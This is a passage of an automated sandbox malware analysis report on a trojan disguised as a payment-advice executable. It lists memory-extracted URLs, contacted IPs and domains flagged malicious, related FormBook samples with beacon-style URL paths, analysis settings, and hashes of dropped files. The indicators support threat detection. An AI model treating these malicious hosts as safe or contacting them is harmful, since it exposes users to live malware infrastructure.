                                                                                      http://www.fonts.comPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.sandoll.co.krPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.transip.nl/privacy-policy/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.urwpp.deDPleasePayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.transip.eu/knowledgebase/entry/5885/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.zhongyicts.com.cnPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1867220338.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.sakkal.comPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.fontbureau.comPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://transip.eu/cp/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://transip.eu/vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.transip.eu/question/100000230finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.ecosia.org/newtab/finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.carterandcone.comlPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://trustpilot.com/review/www.transip.nlfinger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.transip.nl/vragen/110000580/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://ac.ecosia.org/autocomplete?q=finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.fontbureau.com/designers/cabarga.htmlNPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.founder.com.cn/cnPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.fontbureau.com/designers/frere-user.htmlPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://localhost/calculator_server/requests.phpPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exefalse
                                                                                                                                high
                                                                                                                                https://www.transip.nl/vragen/110000572finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.jiyu-kobo.co.jp/Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.transip.eu/privacy-policy/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.fontbureau.com/designers8Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.transip.nl/knowledgebase/zoeken/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.transip.eu/terms-of-service/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs
                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          124.6.61.130
                                                                                                                                          www.comect.onlineSingapore
                                                                                                                                          132425APC-HOSTING-SGAPCHostingPteLtdSGtrue
                                                                                                                                          13.248.169.48
                                                                                                                                          www.hsa.worldUnited States
                                                                                                                                          16509AMAZON-02UStrue
                                                                                                                                          37.97.254.27
                                                                                                                                          dutchdubliners.onlineNetherlands
                                                                                                                                          20857TRANSIP-ASAmsterdamtheNetherlandsNLtrue
                                                                                                                                          172.247.112.164
                                                                                                                                          ccchhua889911.222tt.icuUnited States
                                                                                                                                          40065CNSERVERSUStrue
                                                                                                                                          149.104.34.134
                                                                                                                                          hx2.vip.84dns.comUnited States
                                                                                                                                          174COGENT-174UStrue
                                                                                                                                          156.253.8.115
                                                                                                                                          www.sssvip2.shopSeychelles
                                                                                                                                          132813AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHKtrue
                                                                                                                                          199.193.6.134
                                                                                                                                          www.allstary.topUnited States
                                                                                                                                          22612NAMECHEAP-NETUStrue
                                                                                                                                          3.33.130.190
                                                                                                                                          emirates-visa.netUnited States
                                                                                                                                          8987AMAZONEXPANSIONGBfalse
                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1571277
                                                                                                                                          Start date and time:2024-12-09 08:47:01 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 9m 58s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Run name:Run with higher sleep bypass
                                                                                                                                          Number of analysed new started processes analysed:11
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:2
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample name:Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@10/7@14/8
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 75%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 96%
                                                                                                                                          • Number of executed functions: 193
                                                                                                                                          • Number of non-executed functions: 292
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Execution Graph export aborted for target vTCmFjyxUmdTJX.exe, PID 3756 because it is empty
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          No simulations
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          13.248.169.48MN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.lovel.shop/rxts/
                                                                                                                                          RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.snyp.shop/4nyz/
                                                                                                                                          NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.krshop.shop/5p01/
                                                                                                                                          DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.egyshare.xyz/440l/
                                                                                                                                          purchase order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.aktmarket.xyz/wb7v/
                                                                                                                                          SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.avalanchefi.xyz/vxa5/
                                                                                                                                          ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.remedies.pro/4azw/
                                                                                                                                          Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                          • www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs
                                                                                                                                          Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.smartgov.shop/1cwp/
                                                                                                                                          SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.egyshare.xyz/440l/
                                                                                                                                          37.97.254.27DBROG0eWH7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • orderstream.net/index.php
                                                                                                                                          DBROG0eWH7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • orderstream.net/index.php
                                                                                                                                          WrrCV4QR2J.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.wrautomotive.online/ahec/?XveXHZvx=5igDJT3zPYxoznSfOhoK1Ng2m3hD5JqRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+25ITAAVo7msZgdw==&l4xX=rDStpH0He
                                                                                                                                          Antndte.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                          • www.rocsys.net/3hr5/?TZd=WvKXMpNdKcx12PohJdQ2Nu7zrY//6AeCNDisJJSnngoH0SI3JFeqPH7/T9Xi9rN0AVbH68W87D80yQtOqBVkzxSvcNI04lJ+LQ==&1dr=yP5PQD38
                                                                                                                                          hesaphareketi-01.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                          • www.rocsys.net/uaaq/?XFs82=6R5Xx6907&9pG0L=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA==
                                                                                                                                          New_Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.wrautomotive.online/fdo5/?540H2x=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&fXUX=ShJ8DFcXvtj84pw
                                                                                                                                          PO_YTWHDF3432.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.wrautomotive.online/ahec/
                                                                                                                                          PO_CCTEB77.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.wrautomotive.online/ahec/?KHcH=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+zzorQEnBYkPkOfg==&Vjk=-N-tntX
                                                                                                                                          Fpopgapwdcgvxn.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                          • www.kermisbedrijfkramer.online/ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP
                                                                                                                                          Product_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                          • www.wrautomotive.online/ur4g/?vxM0=G80Xg2gxjV&eh=GM1abjaFQeRWF1TbL/6IPq6IQ8Zq6L6A/eGtDh+rzhSfkUEKySbsXXOahwAFIXwkymySVlBBxGC7SDgkYy5RlvrvRaU4SsaPnA==
                                                                                                                                          No context
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          AMAZON-02USMN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 13.248.169.48
                                                                                                                                          RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 18.141.10.107
                                                                                                                                          boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 54.171.230.55
                                                                                                                                          boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 54.171.230.55
                                                                                                                                          boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 54.171.230.55
                                                                                                                                          cllmxIZWcQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                          • 3.5.167.250
                                                                                                                                          qhjKN40R2Q.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                          • 52.95.134.150
                                                                                                                                          NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 13.248.169.48
                                                                                                                                          jew.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 54.171.230.55
                                                                                                                                          jew.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 18.162.175.118
                                                                                                                                          CNSERVERSUSjew.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 23.225.125.46
                                                                                                                                          SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 154.88.22.105
                                                                                                                                          UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 23.225.159.42
                                                                                                                                          ex86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 156.251.245.99
                                                                                                                                          PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 154.88.22.101
                                                                                                                                          Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 154.88.22.101
                                                                                                                                          Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                          • 23.225.159.42
                                                                                                                                          New Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 154.90.35.240
                                                                                                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 23.225.159.42
                                                                                                                                          lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 23.225.159.42
                                                                                                                                          APC-HOSTING-SGAPCHostingPteLtdSGdB5EGM8l20.dllGet hashmaliciousWannacryBrowse
                                                                                                                                          • 103.14.213.194
                                                                                                                                          TRANSIP-ASAmsterdamtheNetherlandsNLmips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                          • 149.210.209.177
                                                                                                                                          owari.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 185.211.251.117
                                                                                                                                          https://www.drawnames.com/wishlist/edit/D0gYBJzjFoJ7rv0HFu_iKQ-/JAvmRE-y4vYaeZ2GN316lg-Get hashmaliciousUnknownBrowse
                                                                                                                                          • 80.69.88.77
                                                                                                                                          http://www.drawnames.com/wishlist/add/GeoZyywvK48h1oNNizPuIQ-/W47fz4Y7Ik4eooK-94HN8w-Get hashmaliciousUnknownBrowse
                                                                                                                                          • 136.144.160.223
                                                                                                                                          https://www.drawnames.com/wishlist/draw/GeoZyywvK48h1oNNizPuIQ-/W47fz4Y7Ik4eooK-94HN8w-/4Get hashmaliciousUnknownBrowse
                                                                                                                                          • 80.69.88.77
                                                                                                                                          https://lookerstudio.google.com/s/hvL5oZWBksgGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                          • 80.69.89.160
                                                                                                                                          byte.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                          • 87.253.153.8
                                                                                                                                          DBROG0eWH7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 37.97.254.27
                                                                                                                                          DBROG0eWH7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 37.97.254.27
                                                                                                                                          g49e742700.exeGet hashmaliciousEmotetBrowse
                                                                                                                                          • 149.210.171.237
                                                                                                                                          No context
                                                                                                                                          No context
                                                                                                                                          Process:C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1216
                                                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                          Malicious:true
                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1172
                                                                                                                                          Entropy (8bit):5.340528395411087
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:3ytWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:itWSU4xympjms4RIoU99tK8NDv
                                                                                                                                          MD5:0C371003F140A382D5DB7F62075242C0
                                                                                                                                          SHA1:4FEE034169C86493CBE2217B93878ED8D8863857
                                                                                                                                          SHA-256:478A0B7B4158BCB3A82BA889184106FA535554FD60029868CEAAEAD754AAAC71
                                                                                                                                          SHA-512:ECB2DFC940EF150D9B33B901B9FAF36CE3269BCA775318D9E165278BA48EB3C0BC8DFADA2919163D68D2A396214BB55B9E7586B26F28A9F1F5B6D09EE1F5C944
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@...e...................................H.......................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                          Process:C:\Windows\SysWOW64\finger.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):114688
                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
